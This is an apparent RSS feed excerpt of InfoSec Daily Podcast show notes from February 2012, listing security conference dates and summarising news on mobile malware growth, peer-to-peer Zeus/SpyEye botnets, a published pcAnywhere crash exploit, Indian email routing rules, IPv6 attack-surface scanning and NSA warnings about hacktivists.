	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.darkreading.com/mobile-security/167901113/security/news/232601198/mobile-malware-on-the-move-mcafee-report-says.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.darkreading.com/mobile-security/167901113/security/news/232601198/mobile-malware-on-the-move-mcafee-report-says.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The number of new malware samples hit 75 million worldwide last year even as PC malware counts declined, with mobile malware rapidly emerging, according to new data from McAfee Adam Wosotowsky, McAfee, senior anti-spam research analyst and an author of McAfee&#39;s new Fourth Quarter 2011 Threat Report, says there was a significant uptick in mobile malware &#8212; mostly for Android platforms &#8212; between the third and fourth quarters of last year. &quot;We saw the rate of increase in mobile malware really take off compared with [the period] before,&quot; Wosotowsky says.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mobile malware hit more than 400 unique samples in Q4, up from over 100 in the third quarter, and less than 50 samples in the first quarter of last year. McAfee also found that PC malware counts declined during Q4, and were lower than in Q4 of 2010. Even so, the total number of unique malware samples is more than 75 million as of Q4, the report says.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;I expected mobile malware to increase, but I didn&#39;t expect to see mobile malware shoot up like it did,&quot; Wosotowsky says. &quot;I was really expecting to see that when they start porting SpyEye and Zeus to&quot; mobile platforms at some point, he says.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Wosotowsky says McAfee also saw a shift in how the bad guys are deploying malware. &quot;They are moving to a persistent model, where they are trying to get into corporations and steal intellectual property, more money, and to maintain the infection for a long period of time,&#39; he says. &quot;At the same time, it&#39;s important to note that&#39;s because so malware and Trojans under SpyEye now have that capability &#8230; and botmasters can give control of an infected machine to another botmaster&quot; who wants access to a particular organization, he says.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-602-zeus-more-powerful-identity-theft-mobile-malware-google-tracks-do-not-track-button/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3542/0/infosec-daily-podcast-episode-602.mp3" length="19972684" type="audio/mpeg" />
		<itunes:duration>0:41:34</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 602 for February 23, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, David Kennedy, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan.
	&#160;
Announcements:
Social Engineering Training
	When: March 5-9[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 602 for February 23, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, David Kennedy, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan.
	&#160;
Announcements:
Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open! &#160;If you have some Anti-Forensics talks, that would be awesome.
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA http://www.sans.org/mentor/details.php?nid=28014
	Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
	Defcon 20
	When: July 26-29, 2012
	Where: Rio Hotel and Casino &#8211; Las Vegas, NV
	http://defcon.org/
	CFP &#38; Room reservations now open!
	DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://www.net-security.org/malware_news.php?id=2009
	The latest build of the Zeus/SpyEye malware shows a change that could very well hamper the security researchers&#39; ability to take down the botnets using it and to find out the criminals behind them.
	According to Symantec researchers, a previous build already moved towards replacing the bot-to-C&#38;C system with peer-to-peer capabilities so that the bots receive configuration files from other bots, and this new one has finalized the transition.
	&#34;This means that every peer in the botnet can act as a C&#38;C server, while none of them really are one,&#34; say the researchers. &#34;Bots are now capable of downloading commands, configuration files, and executables from other bots &#8211; every compromised computer is capable of providing data to the other bots. We don&#8217;t yet know how the stolen data is communicated back to the attackers, but it&#8217;s possible that such data is routed through the peers until it reaches a drop zone controlled by the attackers.&#34;
	Apart from making such a botnet practically immune to a takedown, the move has also the added benefit of making the tracking and blocking of IP addresses of the C&#38;C servers obsolete.
	In order for the peers to act as a C&#38;C server of sorts, the bot now includes nGinx, an open source Web server, which makes it capable of handling HTTP requests. And those requests are not longer used only for exchanging configuration files, but also to make bots download additional malware (fake AV) and software (proxy engine).
	&#8230;.
	Source: http://www.darkreading.com/security/privacy/232601307/study-users-of-social-networks-smartphones-more-likely-to-be-fraud-victims.html
	If you&#39;re a heavy user of social networks or smartphones, you&#39;re si[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 601 &#8211;  pcAnywhere Crash, DIT Doh, Shadow Network, NSA &amp; GlobalFakeOut</title>
		<link>http://www.isdpodcast.com/episode-601-pcanywhere-crash-dit-doh-shadow-network-nsa-globalfakeout</link>
		<comments>http://www.isdpodcast.com/episode-601-pcanywhere-crash-dit-doh-shadow-network-nsa-globalfakeout#comments</comments>
		<pubDate>Thu, 23 Feb 2012 01:48:02 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3537</guid>
		<description><![CDATA[Episode 601 &#8211; &#160;pcAnywhere Crash, DIT Doh, Shadow Network, NSA &#38; GlobalFakeOut InfoSec Daily Podcast Episode 601 for February 22, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan. &#160; Announcements: Social Engineering Training When: March 5-9, 2012 Where: Seattle, Washington When: July 21-24, 2012 Where: Black Hat Vegas When: August [...]]]></description>
			<content:encoded><![CDATA[<p><span id="internal-source-marker_0.3530908855829411" style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Episode 601 &#8211; &nbsp;pcAnywhere Crash, DIT Doh, Shadow Network, NSA &amp; GlobalFakeOut</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 601 for February 22, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open! &nbsp;If you have some Anti-Forensics talks, that would be awesome.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span><br />
	&nbsp;</p>
<h5 dir="ltr"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></h5>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 23 &#8211; 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Black Hat Vegas</span><br />
	<a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Defcon 20</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 26-29, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Rio Hotel and Casino &#8211; Las Vegas, NV</span><br />
	<a href="http://defcon.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://defcon.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP &amp; Room reservations now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.informationweek.com/news/security/vulnerabilities/232601182"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.informationweek.com/news/security/vulnerabilities/232601182</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Code has been published that attackers could use to crash fully patched versions of pcAnywhere on any Windows PC, without first having to authenticate to the PC.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The exploit details arrived Friday in the form of a Pastebin post from Johnathan Norman, director of security research at Alert Logic. Advertised as a &quot;PCAnywhere Nuke,&quot; the Python code can be used to create a denial of service (DoS) by crashing &quot;the ashost32 service,&quot; he said in the post. &quot;It&#39;ll be respawned so if you want to be a real pain you&#39;ll need to loop this&#8230;my initial impressions are that controlling execution will be a pain.&quot; He said the exploit works even against the most recent, fully patched version of pcAnywhere (version 12.5.0 build 463 and earlier).</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Symantec is aware of the posting and is investigating the claims,&quot; said Symantec spokeswoman Katherine James via email. &quot;We have no additional information to provide at this time.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://pastebin.com/VXkWDM6A"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://pastebin.com/VXkWDM6A</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://timesofindia.indiatimes.com/tech/news/internet/Govt-to-ask-Yahoo-Gmail-to-route-all-mails-through-servers-in-India/articleshow/11978553.cms"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://timesofindia.indiatimes.com/tech/news/internet/Govt-to-ask-Yahoo-Gmail-to-route-all-mails-through-servers-in-India/articleshow/11978553.cms</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Internet content providers Yahoo, Gmail and others would be asked to route all emails accessed in India through the country even if the mail account is registered outside the country.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The move comes in the wake of instances where security agencies could not have a real-time access to some emails as they were registered outside the country but were opened in India.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">During a recent high-level meeting held in the office of Union Home Secretary R K Singh, the Department of Information Technology (DIT) was asked to take up the matter at the earliest with the content providers.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">During the meeting, director general from CERT-in informed that content provider Yahoo automatically locates all email accounts registered in India to the server in India, minutes of the meeting said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">However, Yahoo accounts registered outside India and subsequently accessed from India are routed through servers outside India, it said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;It was decided to advice Yahoo, Gmail etc that all emails accessed from India should be routed through servers in India,&quot; it said, adding that the DIT would take up the matter with the content providers.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://ben.akrin.com/?p=1345"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://ben.akrin.com/?p=1345</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">With more devices coming IPv6 ready out of the box, a shadow network is emerging that nobody is paying attention to.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There&rsquo;s Joe sysadmin, configuring a tight firewall for this new server, default deny, very restrictive &amp; all. This is great but did he realize that there is nothing in front of IPv6? We are used to setting up iptables, ipfw, et cetera. Unfortunately ip6tables &amp; ip6fw too often get forgotten.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">With IPv4, a device was manually configured or wasn&rsquo;t configured until it got an address from DHCP. With IPv6 a device that is not manually configured will hop on the network with a link-local address and try to further discover its settings. In fact, IPv6 reserves a range of addresses for network discovery, these link-local addresses are based on the device&rsquo;s mac address.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Here is what ipv6_surface_analyzer.py does:</span></p>
<ul>
<li><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline;">iterate through a given IPv4 range</span></li>
<li><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline;">for each address in the range, discover if a host sits behind it</span></li>
<li><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline;">port scan potentially found host on IPv4</span></li>
<li><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline;">infer IPv6 link-local address of host based on its mac address</span></li>
<li><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline;">port scan inferred IPv6 address</span></li>
</ul>
<p><span id="internal-source-marker_0.3530908855829411" style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The purpose of which is to establish by how much your attack surface is augmented by link-local IPv6.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.infosecisland.com/blogview/20436-NSA-Wary-of-Potential-Hacktivist-Threat-to-Power-Grid.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infosecisland.com/blogview/20436-NSA-Wary-of-Potential-Hacktivist-Threat-to-Power-Grid.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Wall Street Journal is reporting that National Security agency chief Gen. Keith Alexander has briefed the White House on potential threats to the nation&#39;s power grid network by hacktivist groups such as Anonymous.</span><br />
